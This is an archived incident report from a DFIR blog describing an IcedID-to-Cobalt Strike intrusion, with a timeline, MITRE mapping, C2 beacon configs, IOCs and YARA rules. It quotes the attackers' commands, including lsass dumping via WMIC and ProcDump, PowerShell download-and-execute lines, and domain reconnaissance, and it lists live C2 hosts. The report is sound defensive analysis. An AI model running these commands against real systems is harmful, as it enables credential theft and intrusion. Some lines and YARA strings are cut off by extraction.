{
	"id": "7d0bbe27-1a36-493e-b0d3-c3597d8ee02a",
	"created_at": "2026-04-06T00:21:04.469712Z",
	"updated_at": "2026-04-10T03:24:24.772811Z",
	"deleted_at": null,
	"sha1_hash": "d2418c076b79a9fbd864deb6bd8f3e5889f577c0",
	"title": "IcedID and Cobalt Strike vs Antivirus",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2587702,
	"plain_text": "IcedID and Cobalt Strike vs Antivirus\r\nBy editor\r\nPublished: 2021-07-19 · Archived: 2026-04-05 16:21:58 UTC\r\nIntro\r\nAlthough IcedID was originally discovered back in 2017, it did not gain in popularity until the latter half of 2020.  We have\r\nnow analyzed a couple ransomware cases in 2021 (Sodinokibi \u0026 Conti) that used IcedID as the initial foothold into the\r\nenvironment. \r\nIn June, we saw another threat actor utilize IcedID to download Cobalt Strike, which was used to pivot to other systems in\r\nthe environment.  Similar to the Sodinokibi case, anti-virus (AV) slowed down the attackers.  AV frustrated them to the point\r\nthey temporarily left the environment.  Eleven days later, activity returned to the environment with more Cobalt Strike\r\nbeacons, which they used to pivot throughout the domain using WMI. The threat actors, however, remained unable or\r\nunwilling to complete their final objectives. \r\nCase Summary\r\nThis intrusion once again highlights common tools in-use today for Initial Access and Post-Exploitation.  Our intrusion starts\r\nwhen a malicious Word document is executed that drops and executes an HTA file.  This HTA file is used to download\r\nIcedID in the form of a JPG file.  This file is actually a Windows DLL file, which is executed via regsvr32 (1st stage\r\nIcedID). \r\nIcedID downloads some 2nd stage payloads and loads the DLL into memory with rundll32 (miubeptk2.dll – IcedID – used\r\nfor persistence) and regsvr32 (ekix4.dll – Cobalt Strike beacon – privilege escalation via fodhelper) to pillage the domain. \r\nService Execution (T1569.002) via Cobalt Strike Beacon was used throughout the intrusion for privilege escalation. \r\nWMIC was utilized to launch ProcDump in an attempt to dump lsass.exe.  WMIC was also used to perform discovery of\r\nendpoint security software.  A flurry of other programs were used to perform discovery within the environment including\r\nnltest.exe, adfind.exe via adf.bat, and net.exe.  Command and Control was achieved via IcedID and Cobalt Strike. \r\nThere were numerous attempts at lateral movement via Cobalt Strike beacons, with limited success.  Ultimately, the threat\r\nactors were unsuccessful when AV snagged their attempts to move to certain servers. \r\nParticular to this case, we saw an eleven day gap in activity. While command and control never left, activity–other than\r\nbeaconing, ceased. On day eleven, a new Cobalt Strike infrastructure was introduced to the environment with the threat\r\nactor displaying new techniques that were successful in moving laterally, where the initial activity failed.\r\nThis may indicate a hand off to a new group, or the original actor may have returned, either way, we did not see a final\r\naction on objectives.\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt\r\nStrike, Metasploit, Empire, PoshC2, etc. More information on this service and others can be found here. Two of the Cobalt\r\nStrike servers used in this intrusion were added to our Threat Feed on 6/3/21 and the other one was added on 6/14/21\r\nWe also have artifacts available from this case such as pcaps, memory captures, files, Kape packages, and more, under\r\nour Security Researcher and Organization services.\r\nTimeline\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 1 of 18\n\nAnalysis and reporting completed by @iiamaleks and @THIR_Sec\r\nReviewed by @ICSNick and @MetallicHack\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nInitial access for this intrusion was via a malicious attachment “order 06.21.doc”.  The attachment was a Microsoft Word\r\ndocument that drops a malicious HTA file “textboxNameNamespace.hta”. \r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 2 of 18\n\nExecution\r\nAnalysis of the encoded HTA file revealed that a file named textboxNameNamespace.jpg was downloaded from\r\nhttp://povertyboring2020b[.]com.  This file’s extension is misleading as the file is a Windows DLL. \r\nThe HTA file is written to:\r\n C:\\users\\public\r\nThe HTA file when executed downloads a file named “textboxNameNamespace.jpg”, which is actually an IcedID DLL file\r\nresponsible for the first stage. \r\nThrough the same HTA file, the IcedID first stage DLL file is executed via regsvr32.exe. \r\nIcedID executes via rundll32, dropping DLL files related to both the IcedID second stage and Cobalt Strike beacons. \r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 3 of 18\n\nAfter the initial compromise, the threat actors went silent for eleven days. After that period of time, a new Cobalt Strike\r\nbeacon was run through IcedID and sent forth to a second phase of their activities. \r\nPersistence\r\nIcedID establishes persistence on the compromised host using a scheduled task named ‘{0AC9D96E-050C-56DB-87FA-955301D93AB5}’ that executes its second stage. This scheduled task was observed to be executing hourly under the initially\r\ncompromised user. \r\nPrivilege Escalation\r\nEkix4.dll, a Cobalt Strike payload was executed via fodhelper UAC bypass. \r\nAdditional Cobalt Strike payloads were executed with the same fodhelper UAC bypass technique. \r\nCobalt Strike payloads were used to escalate privileges to SYSTEM via a service created to run a payload using\r\nrundll32.exe as the LocalSystem user.  This activity was observed on workstations, a file server, and a backup server. \r\nGetSystem was also used by the threat actors.\r\nCredential Access\r\nThe threat actors were seen using overpass the hash to elevate privileges in the Active Directory environment via Mimikatz\r\nstyle pass the hash logon events, followed by subsequent suspect Kerberos ticket requests matching network alert signatures.\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 4 of 18\n\nATTACK [PTsecurity] Overpass the hash. Encryption downgrade activity to ARCFOUR-HMAC-MD5\",10002228\r\nUsing these credentials, the threat actors attempted to use a Cobalt Strike beacon injected into the LSASS process to execute\r\nWMIC, which executed ProcDump on a remote system to dump credentials.\r\ncmd.exe /C wmic /node:\"servername.domainname\" process call create \"C:\\PerfLogs\\procdump.exe -accepteula -ma ls\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 5 of 18\n\nThis activity appears to have failed due to Windows Defender activity.\r\nDiscovery\r\nIcedID initially performed some discovery of the local system and the domain. \r\nWMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\r\nipconfig /all systeminfo\r\nnet config workstation\r\nnet view /all /domain nltest /domain_trusts /all_trusts\r\nnltest /domain_trusts\r\nnet view /all\r\nnet group \"Domain Admins\" /domain\r\nLater, Cobalt Strike beacons were used to perform discovery of the system and domain. \r\ncmd.exe /C systeminfo\r\ncmd.exe /C nltest /dclist:DOMAIN.local\r\ncmd.exe /C nltest /domain_trusts /all_trusts\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:55869/'); Find-LocalAdminAccess\r\nA discovery batch script that runs ADFind.exe was dropped to the system. \r\nADFind.exe was executed by the discovery batch script. \r\ncmd.exe /C C:\\Windows\\Temp\\adf\\adf.bat\r\nadfind.exe -f \"(objectcategory=person)\"\r\nadfind.exe -f \"(objectcategory=organizationalUnit)\"\r\nadfind.exe -f \"objectcategory=computer\"\r\nadfind.exe -sc trustdmp\r\nadfind.exe -subnets -f (objectCategory=subnet)\r\nadfind.exe -f \"(objectcategory=group)\"\r\nadfind.exe -gcb -sc trustdmp\r\nPowerView was used to discover local administrator access in the network. The Cobalt Strike beacon itself was used as a\r\nproxy to connect and retrieve the PowerView file. \r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 6 of 18\n\nCobalt Strike was injected into the winlogon.exe process and used to perform further discovery. \r\ncmd.exe /C net group \"domain Admins\" /domain\r\ncmd.exe /C net group \"Enterprise Admins\" /domain\r\ncmd.exe /C ping WORKSTATION\r\ncmd.exe /C net view \\\\WORKSTATION /all\r\ncmd.exe /C net view \\\\DOMAINCONTROLLER /all\r\ncmd.exe /C dir /s\r\nThe following shows the decoded PowerShell commands used by Cobalt Strike to perform discovery. \r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:41046/'); Get-DomainController\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:38102/'); Get-DomainComputer -Properties dnshostname\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:35452/'); Get-DomainComputer -OperatingSystem *server* -Pr\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:61999/'); Get-DomainComputer -Properties dnshostname -Ping\r\n$dr=Get-WmiObject Win32_LogicalDisk; $total=0; foreach($i in $dr){ ; if($i.DriveType -eq 3 ){$diskFill = ([int]($i.Size/1G\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:51127/'); Get-PSDrive\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:34025/'); Invoke-ShareFinder -Ping -CheckShareAccess -Verb\r\nLateral Movement\r\nLateral Movement chain #1 – The attacker was able to successfully move from workstation #1 to workstation #2 via\r\nservice execution.  The attacker tried to replicate this movement technique towards two servers but were stopped when their\r\nCobalt Strike PowerShell payloads were nabbed by AV. \r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 7 of 18\n\nLateral Movement chain #2 – Another attempt was made to move from workstation #1 to one of the servers, but this\r\nattempt was also thwarted by AV.  Just like the previous attempt, a remote service was created, however, this time a DLL\r\npayload was used rather than a PowerShell payload. \r\nLateral Movement chain #3 – Privileges were escalated to SYSTEM on Workstation #1 via the Cobalt Strike ‘GetSystem’\r\ncommand which makes use of named pipes. A Cobalt Strike DLL was copied to a server and executed using WMI. This\r\nactivity was observed on three servers, including the Domain Controller.\r\nCommand and Control\r\nThe logs demonstrate multiple connections from IcedID to their C2 servers, including aws.amazon[.]com for connectivity\r\nchecks. \r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 8 of 18\n\n91.193.19.37|443\r\nlookupup.uno\r\n45.153.240.135|443\r\nagalere.club\r\n12horroser.fun\r\n172.67.222.68|80\r\nfintopikasling.top\r\n185.38.185.121|443\r\ncontocontinue.agency\r\n164.90.157.246|443\r\n109.230.199.73|80\r\nThe Cobalt Strike beacons also make use of multiple C2 servers on the public internet. \r\nCobalt Strike Configs:\r\nkrinsop[.]com\r\n162.244.81.62\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 9 of 18\n\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3S: aa29d305dff6e6ac9cd244a62c6ad0c2\r\nCertificate Subject Key Identifier: 23:FA:7E:CD:F4:13:7C:96:30:AC:3C:DD:D6:25:99:DB:39:39:51:B3\r\nNot Before: Jun 4 18:57:59 2021 (GMT)\r\nNot After : Sep 2 18:57:59 2021 (GMT)\r\nIssuer: Let's Encrypt\r\nSubject Common: krinsop.com\r\nPublic Algorithm: rsaEncryption\r\n{\r\n\"x86\": {\r\n\"config\": {\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n\"Polling\": 5000,\r\n\"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n\"C2 Server\": \"162.244.81.62,/jquery-3.3.1.min.js\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 10,\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n\"Port\": 80,\r\n\"Method 2\": \"POST\",\r\n\"Beacon Type\": \"0 (HTTP)\"\r\n},\r\n\"sha256\": \"198cbe9ac054c0d79229b9d09fcbfbe5caa7702969f1f588eeca4f66318ebf12\",\r\n\"md5\": \"fb325956bbaf5f34ee8f3876a6c14d62\",\r\n\"sha1\": \"1b3c8375ad2087e647b44faf9b8c6460ad9ae97c\",\r\n\"time\": 1623709908992.6\r\n},\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 10 of 18\n\n\"x64\": {\r\n\"config\": {\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n\"Polling\": 5000,\r\n\"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n\"C2 Server\": \"162.244.81.62,/jquery-3.3.1.min.js\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 10,\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n\"Port\": 80,\r\n\"Method 2\": \"POST\",\r\n\"Beacon Type\": \"0 (HTTP)\"\r\n},\r\n\"sha256\": \"9e1261fcefa27729712a78c4c1938987d1a57983839b588c6cb5bd23850d98e1\",\r\n\"md5\": \"cef2407d87d56f2656d502ae3f6e49f2\",\r\n\"sha1\": \"6810f5d44b21377b084b96151ab25e57e7d90abe\",\r\n\"time\": 1623709920309.7\r\n}\r\n}\r\n{\r\n\"x86\": {\r\n\"config\": {\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n\"Polling\": 5000,\r\n\"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n\"C2 Server\": \"krinsop.com,/jquery-3.3.1.min.js\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 10,\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n\"Port\": 443,\r\n\"Method 2\": \"POST\",\r\n\"Beacon Type\": \"8 (HTTPS)\"\r\n},\r\n\"sha256\": \"aa76fb1fa50a24c631a5d40878cc7af8a23ba265842bd9e85578d85f080b203a\",\r\n\"md5\": \"c4e04de7283fcddc4f3e394313e02a8d\",\r\n\"sha1\": \"edee07063c98ed57e12e41196c9bea63a3a0f4ee\",\r\n\"time\": 1623709904481.3\r\n},\r\n\"x64\": {\r\n\"config\": {\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n\"Polling\": 5000,\r\n\"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n\"C2 Server\": \"krinsop.com,/jquery-3.3.1.min.js\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 10,\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n\"Port\": 443,\r\n\"Method 2\": \"POST\",\r\n\"Beacon Type\": \"8 (HTTPS)\"\r\n},\r\n\"sha256\": \"b888d289ee46115ed33164855e74f21e9e2b657c3d11342b34d267a722e137eb\",\r\n\"md5\": \"2562d3b97b8352b785020a7ab7ac334f\",\r\n\"sha1\": \"80389f85fe8bbca65ca35bfa219b6e2a2815069d\",\r\n\"time\": 1623709913218.1\r\n}\r\n}\r\n213.252.245.62\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 11 of 18\n\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3S: ae4edc6faf64d08308082ad26be60767\r\nCertificate Subject Key Identifier: 0F:9E:24:12:4D:36:90:93:55:B5:8D:C1:26:0D:2F:79:BE:C2:78:9B\r\nNot Before: May 26 07:48:00 2021 GMT\r\nNot After : Aug 24 07:48:00 2021 GMT\r\nIssuer Org: Let's Encrypt\r\nSubject Common: charity-wallet.com\r\nPublic Algorithm: rsaEncryption\r\n{\r\n\"x64\": {\r\n\"md5\": \"c282bfab34469e2884ea0a964f7faf86\",\r\n\"sha256\": \"4fb85bef421d23361fce6c7d00ed5047dd47e0ebaf1769be96b10c83c99441f8\",\r\n\"config\": {\r\n\"Jitter\": 37,\r\n\"Method 1\": \"GET\",\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Polling\": 63565,\r\n\"Method 2\": \"POST\",\r\n\"Port\": 443,\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\regsvr32.exe\",\r\n\"C2 Server\": \"charity-wallet.com,/ch.html\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\regsvr32.exe\",\r\n\"HTTP Method Path 2\": \"/ba\"\r\n},\r\n\"time\": 1622753776178.3,\r\n\"sha1\": \"797d697c7a6770b2caa8e3b6c5e2e7b5ab7cc55b\"\r\n},\r\n\"x86\": {\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 12 of 18\n\n\"md5\": \"ed2dbbd89fb9abad7086f71def9f7cf5\",\r\n\"sha256\": \"6477ba90a44152ca98107c0bd00161a8a61daf32418654bc8c0f27e01eb43303\",\r\n\"config\": {\r\n\"Jitter\": 37,\r\n\"Method 1\": \"GET\",\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Polling\": 63565,\r\n\"Method 2\": \"POST\",\r\n\"Port\": 443,\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\regsvr32.exe\",\r\n\"C2 Server\": \"charity-wallet.com,/ch.html\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\regsvr32.exe\",\r\n\"HTTP Method Path 2\": \"/ba\"\r\n},\r\n\"time\": 1622753770976.5,\r\n\"sha1\": \"d1b9040e8bf1db317c18f903ab95f44b30736a78\"\r\n}\r\n}\r\ngmbfrom[.]com\r\n88.80.147.101\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3S: ae4edc6faf64d08308082ad26be60767\r\nCertificate: 04:2f:14:f8:9d:82:a2:39:2e:ea:8e:4f:c1:b7:0d:b8:bf:a7 Not Before: May 20 15:55:27 2021 GMT\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 13 of 18\n\nNot After : Aug 18 15:55:27 2021 GMT\r\nIssuer Org: Let's Encrypt\r\nSubject Common: gmbfrom.com\r\nPublic Algorithm: rsaEncryption\r\n{\r\n\"x86\": {\r\n\"sha1\": \"b785cae596f7b68376464e3e300fe0aff5bea845\",\r\n\"config\": {\r\n\"Method 2\": \"POST\",\r\n\"Port\": 80,\r\n\"Method 1\": \"GET\",\r\n\"Polling\": 5000,\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Jitter\": 10,\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n\"C2 Server\": \"88.80.147.101,/jquery-3.3.1.min.js\",\r\n\"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\"\r\n},\r\n\"time\": 1622753064031.5,\r\n\"sha256\": \"dd0dd0b3e95ff62c45af048c0169e2631ac906da4a603cadbc7014cbcfb4e631\",\r\n\"md5\": \"56830f9cc0fe712e22921a7a5a0f1a53\"\r\n},\r\n\"x64\": {\r\n\"sha1\": \"11724324f8ec1940be87553ae2bd5f96b979a5d6\",\r\n\"config\": {\r\n\"Method 2\": \"POST\",\r\n\"Port\": 80,\r\n\"Method 1\": \"GET\",\r\n\"Polling\": 5000,\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Jitter\": 10,\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n\"C2 Server\": \"88.80.147.101,/jquery-3.3.1.min.js\",\r\n\"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\"\r\n},\r\n\"time\": 1622753068830.2,\r\n\"sha256\": \"36a5e68810f3823470fadd578efb75b5c2d1ffe9f4a16d5566f0722257cc51ce\",\r\n\"md5\": \"9dde7f14a076a5c3db8f4472b87fd11e\"\r\n}\r\n}\r\nImpact\r\nWe did not observe the final actions of the threat actors during this intrusion. \r\nIOCs\r\nNetwork\r\n88.80.147.101|443\r\ngmbfrom.com\r\n213.252.245.62|443\r\ncharity-wallet.com\r\n162.244.81.62|443\r\nkrinsop.com\r\n91.193.19.37|443\r\nlookupup.uno\r\n45.153.240.135|443\r\nagalere.club\r\n12horroser.fun\r\n172.67.222.68|80\r\nfintopikasling.top\r\n185.38.185.121|443\r\ncontocontinue.agency\r\n164.90.157.246|443\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 14 of 18\n\n109.230.199.73|80\r\nhttp://povertyboring2020b[.]com\r\npovertyboring2020b[.]com\r\nFile\r\norder 06.21.doc\r\nb1254d3fa38e2418734d4a2851fc22a6\r\n7c71a7ae38ef95d36434f0b680b30393de9b95ec\r\n95af2e46631be234a51785845079265629462e809e667081eb0b723116e265f3\r\nekix4.dll\r\n74b91ef6278231c152259f58f0420ad4\r\ncbcd475e05642f7e0a049827c6a3c722046c591d\r\ne27b71bd1ba7e1f166c2553f7f6dba1d6e25fa2f3bb4d08d156073d49cbc360a\r\ntextboxNameNamespace.hta\r\ndecfd224c4317795dd7716c680a29dcb\r\n42c52ad41878deeecfe6526431a1e0bf34311286\r\nb17c7316f5972fff42085f7313f19ce1c69b17bf61c107b1ccf94549d495fa42\r\ntextboxNameNamespace.jpg\r\n13c928acdec1cc1682ed84d27b83841a\r\nf90fb56e148b17af89a896bbb0ba0b89fc0ecdb2\r\n010f52eda70eb9ff453e3af6f3d9d20cbda0c4075feb49c209ca1c250c676775\r\nadf.bat\r\nb94bb0ae5a8a029ba2fbb47d055e22bd\r\n035940bd120a72e2da1b6b7bb8b4efab46232761\r\nf6a377ba145a5503b5eb942d17645502eddf3a619d26a7b60df80a345917aaa2\r\nMuif.dll\r\n9e7756f47e57a03e6eb5fe7d2505b870\r\nfb6339704bf11507038ddaf8f01324da5b71ee19\r\n8b9d605b826258e07e63687d1cefb078008e1a9c48c34bc131d7781b142c84ab\r\nDetections\r\nNetwork\r\nET DNS Query to a *.top domain - Likely Hostile\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty\r\nATTACK [PTsecurity] Overpass the hash. Encryption downgrade activity to ARCFOUR-HMAC-MD5\r\nSigma\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_enc_c\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_procdump_lsass.y\r\nhttps://github.com/SigmaHQ/sigma/blob/99b0d32cec5746c8f9a79ddbbeb53391cef326ba/rules/windows/process_creation/win_trust_discovery.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_ad_find_discovery.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/7288ae93b9ec8d09f56cdc623a44a21fa0826afb/rules/windows/process_creation/process_creation_cobaltstrike\r\nhttps://github.com/SigmaHQ/sigma/blob/bbe67ddc73adaa245941fe240db4eff3279078a8/rules/windows/registry_event/sysmon_cobaltstrike_service_in\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_fodhelper.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/builtin/win_pass_the_hash_2.yml\r\nYara\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2021-07-13\r\nIdentifier: Case 4485\r\nReference: https://thedfirreport.com/\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 15 of 18\n\nimport \"pe\"\nrule textboxNameNamespace {\nmeta:\ndescription = \"4485 - file textboxNameNamespace.hta\"\nauthor = \"The DFIR Report\"\nreference = \"https://thedfirreport.com/\"\ndate = \"2021-07-13\"\nhash1 = \"b17c7316f5972fff42085f7313f19ce1c69b17bf61c107b1ccf94549d495fa42\"\nstrings:\n$s1 = \"idGNlamJvbWV0c3lzZWxpZi5nbml0cGlyY3MiKHRjZWpiT1hldml0Y0Egd2VuID0gTG1lciByYXY7KSJsbGVocy50cGlyY3N3Iih0Y2\n$s2 = \"/\n\nfX17KWUoaGN0YWN9O2Vzb2xjLnRzbm9Dbm90dHVCd2VpdjspMiAsImdwai5lY2Fwc2VtY\n$s3 = \"oveTo(-100, -100);var swapLength = tplNext.getElementById('variantDel').innerHTML.split(\\\"aGVsbG8\\\");va\n$s4 = \"wxyz0123456789+/\n\n\" fullword ascii\n$s12 = \"t5cnR7KTAwMiA9PSBzdXRhdHMuZXRhREl4b2J0eGV0KGZpOykoZG5lcy5ldGFESXhvYnR4ZXQ7KWVzbGFmICwiNE9Uc3NldUk9ZmVy\n$s13 = \"tYU5vcmV6IHJhdg==aGVsbG8msscriptcontrol.scriptcontrol\n\nABCDEFGHIJKLMNOPQRSTUV\n$s14 = \"nGlob(pasteVariable){return(tplNext.getElementById(pasteVariable).innerHTML);}function lConvert(){retu\n$s15 = \"ipt'\u003eCall byteNamespaceReference(textSinLibrary)\n\n$s9 = \"Please verify that the correct path and file name are given\" fullword ascii\r\n$s10 = \"Critical error\" fullword ascii\r\n$s11 = \"Please read this information carefully\" fullword ascii\r\n$s12 = \"Unknown error occurred for time: \" fullword ascii\r\n$s13 = \"E 3y4i\" fullword ascii\r\n$s14 = \"D$tOuo2\" fullword ascii\r\n$s15 = \"D$PH9D$8tXH\" fullword ascii\r\n$s16 = \"E$hik7\" fullword ascii\r\n$s17 = \"D$p]mjk\" fullword ascii\r\n$s18 = \"B):0~\\\"Z\" fullword ascii\r\n$s19 = \"Richo/\" fullword ascii\r\n$s20 = \"D$xJij\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 70KB and\r\n( pe.imphash() == \"42205b145650671fa4469a6321ccf8bf\" and pe.exports(\"StartW\") or 8 of them )\r\n}\r\nrule textboxNameNamespace_2 {\r\nmeta:\r\ndescription = \"4485 - file textboxNameNamespace.jpg\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-07-13\"\r\nhash1 = \"010f52eda70eb9ff453e3af6f3d9d20cbda0c4075feb49c209ca1c250c676775\"\r\nstrings:\r\n$s1 = \"uwunhkqlzle.dll\" fullword ascii\r\n$s2 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s3 = \"operator co_await\" fullword ascii\r\n$s4 = \"ggeaxcx\" fullword ascii\r\n$s5 = \"wttfzwz\" fullword ascii\r\n$s6 = \"fefewzydtdu\" fullword ascii\r\n$s7 = \"ilaeemjyjwzjwj\" fullword ascii\r\n$s8 = \"enhzmqryc\" fullword ascii\r\n$s9 = \"flchfonfpzcwyrg\" fullword ascii\r\n$s10 = \"dayhcsokc\" fullword ascii\r\n$s11 = \"mtqnlfpbxghmlupsn\" fullword ascii\r\n$s12 = \"zqeoctx\" fullword ascii\r\n$s13 = \"ryntfydpykrdcftxx\" fullword ascii\r\n$s14 = \"atxvtwd\" fullword ascii\r\n$s15 = \"icjshmfrldy\" fullword ascii\r\n$s16 = \"lenkuktrncmxiafgl\" fullword ascii\r\n$s17 = \"alshaswlqmhptxpc\" fullword ascii\r\n$s18 = \"izonphi\" fullword ascii\r\n$s19 = \"atttyokowqnj\" fullword ascii\r\n$s20 = \"nwvohpazb\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 500KB and\r\n( pe.imphash() == \"4d46e641e0220fb18198a7e15fa6f49f\" and ( pe.exports(\"PluginInit\") and pe.exports(\"alshaswlqm\r\n}\r\nrule case_4485_ekix4 {\r\nmeta:\r\ndescription = \"4485 - file ekix4.dll\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-07-13\"\r\nhash1 = \"e27b71bd1ba7e1f166c2553f7f6dba1d6e25fa2f3bb4d08d156073d49cbc360a\"\r\nstrings:\r\n$s1 = \"f159.dll\" fullword ascii\r\n$s2 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s3 = \"ossl_store_get0_loader_int\" fullword ascii\r\n$s4 = \"loader incomplete\" fullword ascii\r\n$s5 = \"log conf missing description\" fullword ascii\r\n$s6 = \"SqlExec\" fullword ascii\r\n$s7 = \"process_include\" fullword ascii\r\n$s8 = \"EVP_PKEY_get0_siphash\" fullword ascii\r\n$s9 = \"process_pci_value\" fullword ascii\r\n$s10 = \"EVP_PKEY_get_raw_public_key\" fullword ascii\r\n$s11 = \"EVP_PKEY_get_raw_private_key\" fullword ascii\r\n$s12 = \"OSSL_STORE_INFO_get1_NAME_description\" fullword ascii\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 17 of 18\n\n$s13 = \"divisor-\u003etop \u003e 0 \u0026\u0026 divisor-\u003ed[divisor-\u003etop - 1] != 0\" fullword wide\r\n$s14 = \"ladder post failure\" fullword ascii\r\n$s15 = \"operation fail\" fullword ascii\r\n$s16 = \"ssl command section not found\" fullword ascii\r\n$s17 = \"log key invalid\" fullword ascii\r\n$s18 = \"cms_get0_econtent_type\" fullword ascii\r\n$s19 = \"log conf missing key\" fullword ascii\r\n$s20 = \"ssl command section empty\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 11000KB and\r\n( pe.imphash() == \"547a74a834f9965f00df1bd9ed30b8e5\" or 8 of them )\r\n}\r\nMITRE\r\nSpearphishing Attachment – T1566.001\r\nMalicious File – T1204.002\r\nSigned Binary Proxy Execution – T1218\r\nWindows Management Instrumentation – T1047\r\nCommand and Scripting Interpreter – T1059\r\nPowerShell – T1059.001\r\nWindows Command Shell – T1059.003\r\nService Execution – T1569.002\r\nWindows Service – T1543.003\r\nBypass User Account Control – T1548.002\r\nOS Credential Dumping – T1003\r\nSystem Information Discovery – T1082\r\nSecurity Software Discovery – T1518.001\r\nDomain Trust Discovery – T1482\r\nNetwork Share Discovery – T1135\r\nSMB/Windows Admin Shares – T1021.002\r\nLateral Tool Transfer – T1570\r\nApplication Layer Protocol – T1071\r\nInternal case #4485\r\nSource: 